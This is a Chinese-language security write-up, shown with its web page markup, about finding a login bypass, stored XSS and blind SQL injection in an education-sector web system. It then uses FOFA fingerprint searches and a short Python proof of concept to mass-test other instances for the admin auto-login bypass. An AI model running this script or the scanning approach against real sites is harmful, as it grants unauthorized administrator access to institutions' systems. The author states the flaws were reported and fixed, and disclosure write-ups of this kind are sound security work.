实战记录：EDU网站漏洞通杀全过程

一、漏洞挖掘

1、逻辑缺陷

熟悉的页面，熟悉的弱口令测试，但无果

我就把目光转向js审计，果不其然有新发现，可以根据账号自动登录

于是直接构造请求绕过登录

经典的管理员权限

2、存储型XSS

寻找文本输入

浅析：前端：这里的标签都是普通标签，没有像RCDATA元素(RCDATA elements)，有和<title>，会做一次HTML编码，所以可以直接插入危险的js代码。后端：没有任何过滤（xs~</p> <p align="center"> <img src='https://file1.elecfans.com/web2/M00/C7/5C/wKgZomYTWW6ADPvCAACjs_sNLsc382.jpg' alt='安全漏洞' /></p> <p style="text-indent:2em;"> 所以就简单了，直接插入<script>alert('1')</script>即可</p> <p align="center"> <img src='https://file1.elecfans.com/web2/M00/C7/5C/wKgZomYTWW6ASE9lAACFPGdfuOA160.jpg' alt='安全漏洞' /></p> <p style="text-indent:2em;"> 3、SQL注入</p> <p align="center"> <img src='https://file1.elecfans.com/web2/M00/C7/5C/wKgZomYTWW6AJY5UAACg8NjmVGM838.jpg' alt='安全漏洞' /></p> <p style="text-indent:2em;"> 测试无果</p> <p align="center"> <img src='https://file1.elecfans.com/web2/M00/C7/5C/wKgZomYTWW-AZhiMAACZZUkCVdE148.jpg' alt='安全漏洞' /></p> <p style="text-indent:2em;"> 最后发现注入点在第一个函数，果然任何一个输入点都可能是不安全的，是布尔型盲注</p> <p align="center"> <img src='https://file1.elecfans.com/web2/M00/C7/5C/wKgZomYTWW-AVdoBAADQYAsbLw8267.jpg' alt='安全漏洞' /></p> <p style="text-indent:2em;"> 后面就是经典Sqlmap了</p> <p align="center"> <img src='https://file1.elecfans.com/web2/M00/C7/5C/wKgZomYTWW-AbrESAABykGIupuE180.jpg' alt='安全漏洞' /></p> <p style="text-indent:2em;"> <strong>二、继续通杀</strong></p> <p style="text-indent:2em;"> 根据系统指纹在fofa上搜索："xx系统" && icon_hash="11xxxx"有32个IP，看了下，有重复的</p> <p align="center"> <img src='https://file1.elecfans.com/web2/M00/C7/5D/wKgZomYTWW-AQpGcAAA0WXRh4ow523.jpg' alt='安全漏洞' /></p> <p style="text-indent:2em;"> 使用fofa_viewer导出目标 这里我根据第一个逻辑漏洞的漏洞指纹信息，写了一个简单poc</p> <p style="text-indent:2em;">  </p> <p style="text-indent:2em;">  </p> <pre> import requests def poc(url): poc_url = url + '/login/doautologin.edu' data = {'um.userid': "admin"} try: res = requests.post(poc_url, data=data, timeout=5) if (res.headers.get("Set-Cookie")): # 登录成功就会set-cookie print(url + '/login.html') except BaseException:   pass if __name__ == '__main__': with open('url.txt', 'r') as f: for i in f: poc(i.rstrip(' ')) </pre> <p>  </p> <p style="text-indent:2em;">  </p> <p style="text-indent:2em;"> 以上漏洞均已报告给相应学校且已修复</p> <p style="text-indent:2em;"> <strong>三、思考总结</strong></p> <p style="text-indent:2em;"> 1）在访问系统当中的时候F12查看源码是一个不错的习惯（尤其是有前端弹框的）</p> <p style="text-indent:2em;"> 2）前端代码的一切展示行为完全可控(一定要理解这句话)</p> <p style="text-indent:2em;"> 3）了解程序的底层逻辑，你才能更清晰的知道每一个参数的意义</p> <p style="text-indent:2em;"> 本文作者：B0ther</p> <p style="text-indent:2em;"> 审核编辑：黄飞</p> <!-- copy 原来页面的推送 --> <script type="application/ld+json"> { "@context": "https://zhanzhang.baidu.com/contexts/cambrian.jsonld", "@id": "https://m.elecfans.com/article/2662155.html", "title": "实战记录：EDU网站漏洞通杀全过程", "images": [ "https://file1.elecfans.com/web2/M00/C8/42/wKgaomYTWW2APqtEAAAHUOIV7y0400.jpg" ], "description": "浅析：前端：这里的标签都是普通标签，没有像RCDATA元素(RCDATA elements)，有&lt;textarea&gt;和&lt;title&gt;，会做一次HTML编码，所以可以直接插入危险的js代码。后端：没有任何过滤（xs~", "pubDate": "2024-04-08T10:39:51" } </script> <!-- end copy 原来页面的推送 --> </div> <!-- <a href="javascript:" target="_blank"></a> --> <!-- <a href="https://www.elecfans.com/app/download.html" class="open_app_arc baidu_click_tongji2 inAppHide" target="_blank">打开APP阅读更多精彩内容</a> --> <span class="open_app_arc baidu_click_tongji2 downAppBtn inAppHide">打开APP阅读更多精彩内容</span> <div class="see_more_arc hide"> <div class="arrow_more show_more"> <i></i> <i></i> </div> <button class="read_more">点击阅读全文</button> </div> </div> </div> <!--声明-无论是否原创都显示此声明--> <div class="statement"> 声明：本文内容及配图由入驻作者撰写或者入驻合作网站授权转载。文章观点仅代表作者本人，不代表电子发烧友网立场。文章及其配图仅供工程师学习之用，如有内容侵权或者其他违规问题，请联系本站处理。 <a class="complaint handleJumpBy" href="/about/tousu.html" target="_self">举报投诉</a> </div> <!--评论--> <div class="arc_comment comment"> </div> <!--查看电子发烧友网--> <div class="openx-hero inAppHide" style="text-align: center;"> <div class="advertWrap"> <a href="" target="_blank"> <img src=""> </a> </div> </div> <div class="rela_article"> <div class="rela_article_title flex"> <ul class="tab_lis flex"> <li><span>相关推荐</span></li> <li><a href="/tags/SQL.html" target="_self" class="handleJumpBy advertTagId" data-id="5877">SQL</a></li><li><a href="/tags/安全漏洞.html" target="_self" class="handleJumpBy advertTagId" data-id="103234">安全漏洞</a></li><li><a href="/tags/edu.html" target="_self" class="handleJumpBy advertTagId" data-id="174130">edu</a></li> </ul> </div> <ul class="rela_article_content"> <li > <a href="https://bbs.elecfans.com/jishu_154212_1_1.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">笔记本组装<b class='flag-m-1'>全过程</b>图解.pdf</div> <div class="time_and_hot flex"> <span>2010-12-26</span> <span>0</span> </div> </a> </li><li > <a href="https://bbs.elecfans.com/jishu_239370_1_1.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">热转印电路板制作<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2012-06-24</span> <span>0</span> </div> </a> </li><li > <a href="https://bbs.elecfans.com/jishu_257941_1_1.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">PCB 制作<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2012-08-05</span> <span>0</span> </div> </a> </li><li > <a href="https://bbs.elecfans.com/jishu_265728_1_1.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">音箱制作<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2012-08-16</span> <span>0</span> </div> </a> </li><li > <a href="https://bbs.elecfans.com/jishu_435917_1_1.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">有人分享制作蓝牙耳机的<b class='flag-m-1'>全过程</b>吗？</div> <div class="time_and_hot flex"> <span>2014-06-02</span> <span>0</span> </div> </a> </li><li > <a href="https://bbs.elecfans.com/jishu_488502_1_1.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">菜鸟制作51避障小车<b class='flag-m-1'>全过程</b><b class='flag-m-1'>记录</b></div> <div class="time_and_hot flex"> <span>2015-06-18</span> <span>0</span> </div> </a> </li><li > <a href="https://bbs.elecfans.com/jishu_2136240_1_1.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">讲述PCB设计<b class='flag-m-1'>全过程</b>操作</div> <div class="time_and_hot flex"> <span>2021-08-03</span> <span>0</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/165/2009/2009092247648.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">CPU制造<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2009-09-22</span> <span>885</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/qichedianzi/2016/0803/429993.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">DIY安装导航+可视倒车+行车<b class='flag-m-1'>记录</b>+GPS跟踪<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2016-08-03</span> <span>1831</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/Mec/2020/202011261395789.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">小艾智能艾灸盒2代pro拆解<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2020-11-26</span> <span>1191</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/22/163/2021/202106191642114.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">手工制作pcb<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2021-06-19</span> <span>1998</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/70/2022/202201071774655.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">电磁炉的维修<b class='flag-m-1'>全过程</b>分享</div> <div class="time_and_hot flex"> <span>2022-01-10</span> <span>1233</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/Mec/2023/202310102264865.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">屏幕式声光电子琴制作<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2023-10-10</span> <span>148</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/Mec/2023/202311182314195.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">用C语言开发DSP系统<b class='flag-m-1'>全过程</b></div> <div class="time_and_hot flex"> <span>2023-11-18</span> <span>125</span> </div> </a> </li><li > <a href="https://www.elecfans.com/soft/Mec/2023/202311182314205.html" target="_self" class="handleJumpBy"> <div class="rela_article_ct">用C语言开发DSP系统的<b class='flag-m-1'>全过程</b>讲解</div> <div class="time_and_hot flex"> <span>2023-11-18</span> <span>135</span> </div> </a> </li> </ul> </div> <div class="go_elecfans ad-demo inAppHide"></div> <!-- 全部评论 --> <div class="all-comment comment"> <div class="all-comment-content"> <div class="all-com-close flex"> <p class="ph">全部<i>0</i>条评论</p> <span class="close_com"></span> <!-- <span class="edit_com">写评论</span> --> </div> <div class="all_words comment_content" id="all_words"> <div id="scroller"></div> </div> <div class="all_no_comment" class="hide"> <img src="https://staticm.elecfans.com/images/newdetail/all_no_bg.png" alt=""> <p>快来发表一下你的评论吧 !</p> </div> </div> <div class="ft"> <input type="text" placeholder="发评论" maxlength="10000"> <button>发送</button> </div> </div> <input type="hidden" id="cover_desc" value=" 一、漏洞挖掘 1、逻辑缺陷 熟悉的页面，熟悉的弱口令测试，但无果 我就把目光转向js审计，果不其然有新发现，可以根据账号自动登录 于是直接构造请求绕过登录 经典的管理员权限 2、存储型XSS 寻找文本输入 浅析：前端：这里的标签都是普通标签，没有像RCDATA元素(RCDATA elements)，有和，会做一次HTML编码，所以可以直接插入危险的js代码。后端：没有任何过滤（xs~ 所以就简单"> <input type="hidden" id="current_url" value="https://m.elecfans.com/article/2662155.html"> <input type="hidden" id="title" value="实战记录：EDU网站漏洞通杀全过程"> <input type="hidden" id="pc_domain" value="https://www.elecfans.com"> <input type="hidden" id="aid" value="2662155"> <input type="hidden" id="pid" value=""> <!-- 文章作者id --> <input type="hidden" id="column_uid" value="5699571"> <!-- 企业号文章id --> <input type="hidden" id="evip_article_id" value=""> <!-- 是企业号文章 store_flag =15 --> <input type="hidden" id="store_flag" value="13"> <input type="hidden" id="evip_type" value="0"> <!-- 是企业号文章 store_flag =15 --> <input type="hidden" id="evip_id" value="0"> <!--打开APP底部悬浮按钮--> <!-- <div class="open_app_btn">打开APP</div> --> <footer class="art_footer flex"> <input type="text" placeholder="发评论" maxlength="10000" id="commentTxt"> <div class="flex"> <span class="ft_comment" data-com="发评论"> <i class="sups"></i> </span> <span class="ft_give_up "> <!-- --> </span> <span class="ft_star "> <!-- --> </span> <span class="ft_share btn-createCover"></span> </div> </footer> <div class="login-reg-fixed inAppHide" data-uid="0"> <a href="/login.html" class="login-reg-btn"> 登录/注册 </a> </div> <!--二维码--> <img src="" alt="" id="qrious" style="display: none;"> <!--老的底部 隐藏 --> <div class="new-footer inAppHide"> <div class="flex-center"><a href="https://www.elecfans.com/app/download.html" target="_blank">下载APP</a></div> <div class="flex-center"> <a href="/login.html" class="login-reg-btn"> 登录注册 </a> <span class="line">|</span><a href="https://m.elecfans.com/about/tousu.html">投诉反馈</a><span class="line">|</span><a href="https://author.baidu.com/home/1563378682824805?from=dusite_artdetailh5">电子发烧友网</a> </div> <div class="flex-center">© 2021 elecfans.com</div> <div class="flex-center"><a href="https://beian.miit.gov.cn/">湘ICP备2023018690号</a></div> <div><input type="hidden" value="0" name="arc_relate_vid"></div> </div> </div> <!--微信分享图片地址--> <input type="hidden" id="shareWxImg" value="https://file1.elecfans.com/web2/M00/C8/42/wKgaomYTWW2APqtEAAAHUOIV7y0400.jpg"> <!--微信分享图片地址--> <script> /** * 判断是否微信浏览器 * @return {Boolean} [description] */ function is_weixin() { var ua = navigator.userAgent.toLowerCase(); if (ua.match(/MicroMessenger/i) == "micromessenger") { return true; } else { return false; } } $(function () { $(window).scroll(function (e) { var window_w = window.innerWidth || document.documentElement.clientWidth || document.body.clientWidth; var window_h = window.innerHeight || document.documentElement.clientHeight || document.body.clientHeight; if (document.body.scrollTop + document.documentElement.scrollTop > window_h * 2) { $('.go_top').show(); } else { $('.go_top').hide(); } }); $('.go_top').on('click', function () { document.body.scrollTop = 0; document.documentElement.scrollTop = 0; return false; }); // 添加广告链接的Google Analytics事件跟踪 $('a').on('click', function () { var href = $(this).attr('href'); if (href) { var bannerArr = href.match(/__bannerid=(\d+)__/); var zoneidArr = href.match(/__zoneid=(\d+)__/); if ((bannerArr instanceof Array) && bannerArr.length == 2) { var bannerid = bannerArr[1]; var zoneid = zoneidArr[1]; ga('send', 'event', 'mElecfansAd', 'click', 'zoneid:' + zoneid + ',bannerid: ' + bannerid, 1); gtag('event', 'mElecfansAd', { 'zoneid': zoneid, 'bannerid': 'bannerid', 'describe': 'click' }); } } }); // 微信浏览器底部显示关注微信 /* if (is_weixin()) { $('#foot-fixed').hide(); $('#foot-fixed-wx').show(); }*/ $('#foot-img-wx-small').click(function () { $('#body-wx-big img').toggle(); }); }); </script> <!-- 是否完善资料代码 s --> <div class="perfect_infomation_tip"> <span class="no_tip_day3">×</span> <div class="perfect_infomation_tip_box go_perfect_btn"> <span class="tip_jifen_text">20</span> <div> <img class="tip_jifen" src="https://staticm.elecfans.com/images/tip_jifen.png"> </div> <div> 完善资料，<br>赚取积分 </div> </div> </div> <!-- 是否完善资料代码 e --> <script src="https://staticm.elecfans.com/weixinPrize/js/layer_mobile/layer.js"></script> <script src="https://staticm.elecfans.com/organizing/js/organizing.js?20230825" type="text/javascript" ></script> <script src="https://staticm.elecfans.com/hqAdvert.js?v2" type="text/javascript" ></script> <script src="https://staticm.elecfans.com/xgPlayer.js" type="text/javascript" ></script> <script> $(function(){ var scrollTimer $(window).on("scroll",function(){ //滚动的时候悬浮缩回去 否则正常展示 $(".perfect_infomation_tip_box").css("right","0px") clearTimeout(scrollTimer); scrollTimer=setTimeout(function(){ $(".perfect_infomation_tip_box").css("right"," -70px"); },300) }) // 用户下载附件判断登录 $("a[data-annex]").click(function(){ if($("#uid").attr("data-uid")== "0" || !$("#uid").attr("data-uid")){ window.location.href="/login.html" }else{ var down_id= $(this).attr("data-annex"); var down_href= $('#'+down_id).val(); window.open(down_href); } return false }) /* //判断当天是否弹出手机验证如果弹出这 if(typeof isVerification_new === "function"){ if(window.localStorage.getItem("m_verification")!==newDate_current()){ //弹出是否手机验证 //弹出是否手机验证 isVerification_new(function(){ //完成手机号验证 后判断是否完善资料 isPerfectInfo_phone($) }) } }*/ }); (function () { //百度推广 var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s); //add sunjinliang 2021.1.11 copy 原来的统计 var user_uname = $('input[name="column-type-name"]').val(); //发烧友增加百度统计自定义变量统计单一用户数据访问量 var _hmt = _hmt || []; if (_hmt && user_uname == '发烧友学院') { _hmt.push(['_setCustomVar', 1, 'ChannelID', '发烧友学院', 3]); } var google_title = user_uname; ga('send', { hitType: 'pageview', title: google_title, dimension0: 'Mobile' }); gtag('event', 'pageview', { 'title': google_title, 'dimension0': 'Mobile', 'describe': 'pageview' }); $(".baidu_click_tongji1").click(function(){ sendGA("头部") }) $(".baidu_click_tongji2").click(function(){ sendGA("中部") }) $(".baidu_click_tongji3").click(function(){ sendGA("尾部") }) function sendGA(content){ //向百度发送数据 if(typeof(_hmt)!="undefined"){ //时间分类===_trackEvent 详情专题页面==zt_detail 点击事件==='click' 哪一个部分点击（content）==== 头部中部尾部 _hmt.push(['_trackEvent', "zt_detail", 'click', content]); } } })(); </script> <script src="https://staticm.elecfans.com/artilePartjs.js?v=20230803160700" type="text/javascript" ></script> </body> </html>